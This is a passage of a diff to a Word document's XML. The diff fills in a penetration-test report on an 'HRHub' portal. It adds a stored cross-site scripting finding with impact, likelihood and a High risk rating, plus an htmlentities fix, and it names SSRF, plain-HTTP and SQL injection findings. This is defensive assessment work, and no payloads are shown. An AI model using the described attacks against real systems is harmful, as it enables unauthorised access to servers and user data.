+              <w:t xml:space="preserve"> to open up that malicious anonymous question.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> For a detailed walkthrough, see </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Exploitation_1" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>Appendix 2, Section 2</w:t>
+              </w:r>
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>, Exploitation 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Attackers can also fetch a file from the</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>filesystem</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> since in this case the code </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>actually</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> execut</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">es </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>on the server side</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> [1]. See </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Exploitation_2" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                  <w:lang w:eastAsia="zh-CN"/>
+                </w:rPr>
+                <w:t>Appendix 2, Section 2, Exploitation 2</w:t>
+              </w:r>
+            </w:hyperlink>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6226,18 +6751,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="15" w:name="_Toc71299219"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="16" w:name="_Toc71325112"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Impact</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="15"/>
+            <w:bookmarkEnd w:id="16"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6262,26 +6788,71 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Major:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Malicious users</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">can perform unauthorised action on behalf of HR team members and fetch files from the server. This vulnerability </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve">threatens not only the </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>xyz</w:t>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>HRHub</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t xml:space="preserve"> with this vulnerability</w:t>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> portal but also potentially any other systems on the server and the server itself. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>However, s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ame as the SQL injection case, the attacker must already hold a set of valid credentials to exploit the vulnerability.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6301,18 +6872,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc71299220"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="17" w:name="_Toc71325113"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Likelihood</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="16"/>
+            <w:bookmarkEnd w:id="17"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6338,14 +6910,34 @@
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Poss</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>ible:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Inputs in web applications are the most likely to be exploited by attackers while exploiting this vulnerability requires the attacker to have a set of login credentials. Therefore, the overall likelihood is said to be possible.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6365,18 +6957,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc71299221"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="18" w:name="_Toc71325114"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Risk Rating</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="17"/>
+            <w:bookmarkEnd w:id="18"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6393,32 +6986,48 @@
           <w:p>
             <w:pPr>
               <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>Informational / Low / Medium / High / Extreme</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>This is the reasoning behind my rating</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">High: </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">Referring to the risk matrix in </w:t>
+            </w:r>
+            <w:hyperlink w:anchor="_Appendix_I_-" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>Appendix 1</w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:r>
+              <w:t>, possible likelihood and major impact suggest a high risk.</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">This vulnerability does not only affect the current system but also expose potential risks to the server. </w:t>
+            </w:r>
+            <w:r>
+              <w:t>Moreover, i</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">t also provides critical information for </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">the </w:t>
+            </w:r>
+            <w:r>
+              <w:t>server-side request forgery vulnerability</w:t>
+            </w:r>
+            <w:r>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6438,18 +7047,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc71299222"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="19" w:name="_Toc71325115"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>References</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="18"/>
+            <w:bookmarkEnd w:id="19"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6520,18 +7130,19 @@
           <w:p>
             <w:pPr>
               <w:pStyle w:val="Heading3"/>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:bookmarkStart w:id="19" w:name="_Toc71299223"/>
+              <w:keepNext w:val="0"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="20" w:name="_Toc71325116"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Recommendation</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="19"/>
+            <w:bookmarkEnd w:id="20"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6556,25 +7167,109 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>The fix goes here</w:t>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>HTML encode the users’ inputs to avoid executing malicious code. For example</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:leftChars="100" w:left="220"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$question = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>htmlentities</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>($_POST["question"])</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:ind w:leftChars="100" w:left="220"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>// then display the question</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:p/>
     <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc71299224"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc71325117"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -6582,7 +7277,7 @@
       <w:r>
         <w:t>Server-side request forgery vulnerability present in the website validation functionality</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -6624,14 +7319,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="21" w:name="_Toc71299225"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71325118"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Description</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="21"/>
+            <w:bookmarkEnd w:id="22"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6682,14 +7377,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc71299226"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71325119"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Proof of Concept</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="22"/>
+            <w:bookmarkEnd w:id="23"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6740,14 +7435,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc71299227"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71325120"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Impact</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="23"/>
+            <w:bookmarkEnd w:id="24"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6815,14 +7510,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc71299228"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71325121"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Likelihood</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="24"/>
+            <w:bookmarkEnd w:id="25"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6879,14 +7574,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc71299229"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71325122"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Risk Rating</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="25"/>
+            <w:bookmarkEnd w:id="26"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -6952,14 +7647,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc71299230"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71325123"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>References</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="26"/>
+            <w:bookmarkEnd w:id="27"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7016,14 +7711,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="27" w:name="_Toc71299231"/>
+            <w:bookmarkStart w:id="28" w:name="_Toc71325124"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Recommendation</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="27"/>
+            <w:bookmarkEnd w:id="28"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7066,7 +7761,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc71299232"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc71325125"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -7080,7 +7775,7 @@
       <w:r>
         <w:t>Sensitive information transported in plain text via HTTP</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -7121,14 +7816,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="29" w:name="_Toc71299233"/>
+            <w:bookmarkStart w:id="30" w:name="_Toc71325126"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Description</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="29"/>
+            <w:bookmarkEnd w:id="30"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7179,14 +7874,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="30" w:name="_Toc71299234"/>
+            <w:bookmarkStart w:id="31" w:name="_Toc71325127"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Proof of Concept</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="30"/>
+            <w:bookmarkEnd w:id="31"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7237,14 +7932,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="31" w:name="_Toc71299235"/>
+            <w:bookmarkStart w:id="32" w:name="_Toc71325128"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Impact</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="31"/>
+            <w:bookmarkEnd w:id="32"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7312,14 +8007,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="32" w:name="_Toc71299236"/>
+            <w:bookmarkStart w:id="33" w:name="_Toc71325129"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Likelihood</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="32"/>
+            <w:bookmarkEnd w:id="33"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7376,14 +8071,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="33" w:name="_Toc71299237"/>
+            <w:bookmarkStart w:id="34" w:name="_Toc71325130"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Risk Rating</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="33"/>
+            <w:bookmarkEnd w:id="34"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7449,14 +8144,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="34" w:name="_Toc71299238"/>
+            <w:bookmarkStart w:id="35" w:name="_Toc71325131"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>References</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="34"/>
+            <w:bookmarkEnd w:id="35"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7513,14 +8208,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="35" w:name="_Toc71299239"/>
+            <w:bookmarkStart w:id="36" w:name="_Toc71325132"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Recommendation</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="35"/>
+            <w:bookmarkEnd w:id="36"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7563,7 +8258,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="_Toc71299240"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc71325133"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -7587,7 +8282,7 @@
       <w:r>
         <w:t>card attack vulnerability present in the API for trainings</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -7634,14 +8329,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="37" w:name="_Toc71299241"/>
+            <w:bookmarkStart w:id="38" w:name="_Toc71325134"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Description</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="37"/>
+            <w:bookmarkEnd w:id="38"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7697,14 +8392,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="38" w:name="_Toc71299242"/>
+            <w:bookmarkStart w:id="39" w:name="_Toc71325135"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Proof of Concept</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="38"/>
+            <w:bookmarkEnd w:id="39"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7760,14 +8455,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="39" w:name="_Toc71299243"/>
+            <w:bookmarkStart w:id="40" w:name="_Toc71325136"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Impact</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="39"/>
+            <w:bookmarkEnd w:id="40"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7840,14 +8535,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="40" w:name="_Toc71299244"/>
+            <w:bookmarkStart w:id="41" w:name="_Toc71325137"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Likelihood</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="40"/>
+            <w:bookmarkEnd w:id="41"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7909,14 +8604,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="41" w:name="_Toc71299245"/>
+            <w:bookmarkStart w:id="42" w:name="_Toc71325138"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Risk Rating</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="41"/>
+            <w:bookmarkEnd w:id="42"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -7987,14 +8682,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="42" w:name="_Toc71299246"/>
+            <w:bookmarkStart w:id="43" w:name="_Toc71325139"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>References</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="42"/>
+            <w:bookmarkEnd w:id="43"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -8056,14 +8751,14 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="43" w:name="_Toc71299247"/>
+            <w:bookmarkStart w:id="44" w:name="_Toc71325140"/>
             <w:r>
               <w:rPr>
                 <w:b/>
               </w:rPr>
               <w:t>Recommendation</w:t>
             </w:r>
-            <w:bookmarkEnd w:id="43"/>
+            <w:bookmarkEnd w:id="44"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -8106,14 +8801,14 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="_Appendix_I_-"/>
-      <w:bookmarkStart w:id="45" w:name="_Toc71299248"/>
-      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkStart w:id="45" w:name="_Appendix_I_-"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71325141"/>
+      <w:bookmarkEnd w:id="45"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix I - Risk Matrix</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="45"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -8177,12 +8872,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="46" w:name="_Toc71299249"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc71325142"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="46"/>
+      <w:bookmarkEnd w:id="47"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -8198,8 +8893,9 @@
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Section_1_–"/>
-      <w:bookmarkEnd w:id="47"/>
+      <w:bookmarkStart w:id="48" w:name="_Section_1_–"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc71325143"/>
+      <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8213,6 +8909,7 @@
         </w:rPr>
         <w:t>ection 1 – SQL injection exploitation walkthrough</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="49"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8299,14 +8996,14 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="895"/>
-        <w:gridCol w:w="3920"/>
+        <w:gridCol w:w="704"/>
+        <w:gridCol w:w="4111"/>
         <w:gridCol w:w="4204"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -8329,14 +9026,17 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:jc w:val="center"/>
               <w:rPr>
